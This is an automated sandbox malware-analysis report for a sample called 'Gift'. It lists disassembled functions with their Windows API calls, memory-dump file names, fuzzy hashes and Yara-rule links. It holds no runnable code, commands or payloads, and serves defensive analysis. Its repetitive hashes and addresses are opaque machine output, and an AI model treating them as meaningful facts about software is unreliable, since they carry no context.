                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00335877
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                          • String ID:
                                                                          • API String ID: 2833360925-0
                                                                          • Opcode ID: a9908b3d6a2b5ce0b3809af1732d689128cb86ab4f95c15718b6eaa78008800e
                                                                          • Instruction ID: 14a639ae1adfe9351f03e903ae539e52495513023cafb81eba7e662f8d1db2d9
                                                                          • Opcode Fuzzy Hash: a9908b3d6a2b5ce0b3809af1732d689128cb86ab4f95c15718b6eaa78008800e
                                                                          • Instruction Fuzzy Hash: 6D016935E01A2DDBCF0A9FE4DC89AEEBBBCFB09711F018556E401B6140CB709550CBA1
                                                                          Function 00327D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?,?,?,00328073), ref: 00327D45
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?,?), ref: 00327D60
                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?,?), ref: 00327D6E
                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?), ref: 00327D7E
                                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?,?), ref: 00327D8A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 3897988419-0
                                                                          • Opcode ID: 171ef278cbb195654370946d4e411ce00bdef88683565affed852dfcbe1f32ba
                                                                          • Instruction ID: ebbe6e678d1b4c10e6452eb129eb172607feb7706dc82ffa870ec824b660d59d
                                                                          • Opcode Fuzzy Hash: 171ef278cbb195654370946d4e411ce00bdef88683565affed852dfcbe1f32ba
                                                                          • Instruction Fuzzy Hash: 3A017C76605224ABDB168F64EC45BAA7BADFF84752F148024F908D7210D7B1ED00CBE0
                                                                          Function 00328CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00328CDE
                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00328CE8
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00328CF7
                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00328CFE
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00328D14
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 74a28e696ba62d3ea48fd60ae3b69e1b87f8c3e19e30697b426dcb48350eaf38
                                                                          • Instruction ID: 197bc59c93c7fe78963f05cfc7d2f99e325069d0c5df16f175981567d07dff86
                                                                          • Opcode Fuzzy Hash: 74a28e696ba62d3ea48fd60ae3b69e1b87f8c3e19e30697b426dcb48350eaf38
                                                                          • Instruction Fuzzy Hash: BAF0AF34201214AFEB160FA4AC8EE6B3BACEF4A754F108425F904C2190CAA19C04DB60
                                                                          Function 00328D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00328D3F
                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00328D49
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D58
                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D5F
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D75
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 80447417e09f891466dcab9357ee4477796d461f4fab3814ae3fb7b9006933f8
                                                                          • Instruction ID: 0c6521ef21195f39495e71181ec7fac3df67d273b2d7ed5fbda305838853041f
                                                                          • Opcode Fuzzy Hash: 80447417e09f891466dcab9357ee4477796d461f4fab3814ae3fb7b9006933f8
                                                                          • Instruction Fuzzy Hash: 2CF0A934211214AFEB260FA4FC89F6B3BACEF8A754F144529F944C21A0CBB19D05DB60
                                                                          Function 0032CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0032CD90
                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0032CDA7
                                                                          • MessageBeep.USER32(00000000), ref: 0032CDBF
                                                                          • KillTimer.USER32(?,0000040A), ref: 0032CDDB
                                                                          • EndDialog.USER32(?,00000001), ref: 0032CDF5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 684d89e7e68a8ba3676dcb8c9b78d0054e75c2bd9592dbf4091e5d39c060b7d2
                                                                          • Instruction ID: 80504e2c6ae447c984e46de30e1f117e44e1986d6956cb5fb63f39a4fdc3642d
                                                                          • Opcode Fuzzy Hash: 684d89e7e68a8ba3676dcb8c9b78d0054e75c2bd9592dbf4091e5d39c060b7d2
                                                                          • Instruction Fuzzy Hash: 2901D630510714ABEB265B24ED4FBAB7B7CFB00701F004669F583A14E1DBF0A9648B90
                                                                          Function 002D178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EndPath.GDI32(?), ref: 002D179B
                                                                          • StrokeAndFillPath.GDI32(?,?,0030BBC9,00000000,?), ref: 002D17B7
                                                                          • SelectObject.GDI32(?,00000000), ref: 002D17CA
                                                                          • DeleteObject.GDI32 ref: 002D17DD
                                                                          • StrokePath.GDI32(?), ref: 002D17F8
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: ed9a2583c097970bae976bed4be8bcd6312358be92288a6e3c3dfad7c5556b16
                                                                          • Instruction ID: 70d71d840e3d688a46a5f15ed815de9b0899b48c653e0efb81cab13c502189a3
                                                                          • Opcode Fuzzy Hash: ed9a2583c097970bae976bed4be8bcd6312358be92288a6e3c3dfad7c5556b16
                                                                          • Instruction Fuzzy Hash: 40F0C93002C209BBEB276F25ED4E7597FA8A701326F148216F429556F0C7B249A5DF10
                                                                          Function 0033C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 0033CA75
                                                                          • CoCreateInstance.OLE32(00363D3C,00000000,00000001,00363BAC,?), ref: 0033CA8D
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • CoUninitialize.OLE32 ref: 0033CCFA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                          • String ID: .lnk
                                                                          • API String ID: 2683427295-24824748
                                                                          • Opcode ID: cb623493cd7246ce2d0844681ae142d3a15c288e89f92ebe12b3b0885d23692e
                                                                          • Instruction ID: ae0495860015fe2906f34d544fe5be1028d4e027ab7bea3ca4c3c1f0242301e0
                                                                          • Opcode Fuzzy Hash: cb623493cd7246ce2d0844681ae142d3a15c288e89f92ebe12b3b0885d23692e
                                                                          • Instruction Fuzzy Hash: F8A14971514205AFD300EF64C891EAFB7E8EF98708F40496DF155972A2EB70EE19CB92
                                                                          Function 002DE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
                                                                            • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 002E1680: _memmove.LIBCMT ref: 002E16DB
                                                                          • __swprintf.LIBCMT ref: 002DE598
                                                                          Strings
                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002DE431
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                          • API String ID: 1943609520-557222456
                                                                          • Opcode ID: a39a647851c5dd4ac3d3735e27e1706022549877ef422dd06e69150cf429ca77
                                                                          • Instruction ID: f42d2949ee974b7242857c17edda8c1a21525609df287156740a36c8278804ff
                                                                          • Opcode Fuzzy Hash: a39a647851c5dd4ac3d3735e27e1706022549877ef422dd06e69150cf429ca77
                                                                          • Instruction Fuzzy Hash: 739190711286419FCB14FF24C895C6EB7A8EF95340F81092EF5959B2A1EB30ED64CF92
                                                                          Function 002F523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __startOneArgErrorHandling.LIBCMT ref: 002F52CD
                                                                            • Part of subcall function 00300320: __87except.LIBCMT ref: 0030035B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandling__87except__start
                                                                          • String ID: pow
                                                                          • API String ID: 2905807303-2276729525
                                                                          • Opcode ID: 2ad70f5dd6ff05d9d14d059dddacdea5f45175846537cb7f148e101524649936
                                                                          • Instruction ID: 120f1bf802848e7bef90aa2488fc8f6d30d620b2c248ca8adf3f9d4c9e912aac
                                                                          • Opcode Fuzzy Hash: 2ad70f5dd6ff05d9d14d059dddacdea5f45175846537cb7f148e101524649936
                                                                          • Instruction Fuzzy Hash: 84518221E2BA0A97CB1B7F19C92137AAB949B00790F308E79E7C1451D5EF748CE49F46
                                                                          Function 002F0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #$+
                                                                          • API String ID: 0-2552117581
                                                                          • Opcode ID: 687c69d825f4a0c38941095f99c7ad769fc3d270fe916ad651c42c45479a7664
                                                                          • Instruction ID: 3657cabd9c734005f73bcbe330f201033602dc6c2caeb582b8792ad71be4b9ba
                                                                          • Opcode Fuzzy Hash: 687c69d825f4a0c38941095f99c7ad769fc3d270fe916ad651c42c45479a7664
                                                                          • Instruction Fuzzy Hash: 6C515A755002AACFDF26EF68D482AFABBA4FF55310F144065FD929B291D7309C62CB60
                                                                          Function 002DE7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_free
                                                                          • String ID: #V.
                                                                          • API String ID: 2620147621-4118664886
                                                                          • Opcode ID: 4e09ce321734f0cf85ac12983ab42f999b4a7557f6bb3408908d3c144ba121fc
                                                                          • Instruction ID: 1af07ec90ced4c5d30df04d92f713177152e2266d2b744d2256dabada2882591
                                                                          • Opcode Fuzzy Hash: 4e09ce321734f0cf85ac12983ab42f999b4a7557f6bb3408908d3c144ba121fc
                                                                          • Instruction Fuzzy Hash: 2D516A716187428FDB28DF28C481B6AB7E5BF85354F05492EE9898B351EB31EC51CB42
                                                                          Function 002ECF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$_memmove
                                                                          • String ID: ERCP
                                                                          • API String ID: 2532777613-1384759551
                                                                          • Opcode ID: 50f377d32cf25605fab5e7bd4ab5c757a68f12fb562ae39caf7d71224de098b1
                                                                          • Instruction ID: afc51b3964fff071c03af41e79493b2ce32cc0cb5717c094bf47a4411758a0e2
                                                                          • Opcode Fuzzy Hash: 50f377d32cf25605fab5e7bd4ab5c757a68f12fb562ae39caf7d71224de098b1
                                                                          • Instruction Fuzzy Hash: 5151F4B191034A9FDB24DF66C8807AABBF8EF04310F64856EE94ADB240E770D691CB40
                                                                          Function 0032A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00331CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00329E4E,?,?,00000034,00000800,?,00000034), ref: 00331CE5
                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0032A3F7
                                                                            • Part of subcall function 00331C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00329E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00331CB0
                                                                            • Part of subcall function 00331BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00331C08
                                                                            • Part of subcall function 00331BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00329E12,00000034,?,?,00001004,00000000,00000000), ref: 00331C18
                                                                            • Part of subcall function 00331BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00329E12,00000034,?,?,00001004,00000000,00000000), ref: 00331C2E
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0032A464
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0032A4B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                          • String ID: @
                                                                          • API String ID: 4150878124-2766056989
                                                                          • Opcode ID: ede2e97f26d9a223f2751c195da748a684b6f2cfa7d61b81116942c963539e41
                                                                          • Instruction ID: 6033f44020603d3f7e155deb9817220811dd23b0663df507ac8b3ff271f33da2
                                                                          • Opcode Fuzzy Hash: ede2e97f26d9a223f2751c195da748a684b6f2cfa7d61b81116942c963539e41
                                                                          • Instruction Fuzzy Hash: 11414E7294021CBFDB11DFA4DD86ADEB7B8EF45300F004095FA55B7290DAB1AE45CBA1
                                                                          Function 003579FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00357A86
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00357A9A
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00357ABE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: d9a53a94936e817c5aa86fd481aa8b2ca2b6256e44adeeaac96f71d2987d9bd6
                                                                          • Instruction ID: bd534c64fda9b4deb2c0766067a684ac645f3d28a5bf170d4e5fddee23f7c604
                                                                          • Opcode Fuzzy Hash: d9a53a94936e817c5aa86fd481aa8b2ca2b6256e44adeeaac96f71d2987d9bd6
                                                                          • Instruction Fuzzy Hash: 6B21A332610219BFDF268F54DC86FEE3B69EF48714F124114FE156B2E0DAB1A8548BA0
                                                                          Function 003581B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0035826F
                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0035827D
                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00358284
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$DestroyWindow
                                                                          • String ID: msctls_updown32
                                                                          • API String ID: 4014797782-2298589950
                                                                          • Opcode ID: 2c9743a8064557aefef8dfee0f1f7abea92bba9110d89a1e432c0a9fdb4cd8a7
                                                                          • Instruction ID: fe8b391380479505a36b2a6f3f48694bbee5e672b6340815ba209e8a7b282e74
                                                                          • Opcode Fuzzy Hash: 2c9743a8064557aefef8dfee0f1f7abea92bba9110d89a1e432c0a9fdb4cd8a7
                                                                          • Instruction Fuzzy Hash: 0D21AEB1614208AFDB02DF58CC86DA737EDEB5A394F050459FA01AB2A1CB71EC15CFA0
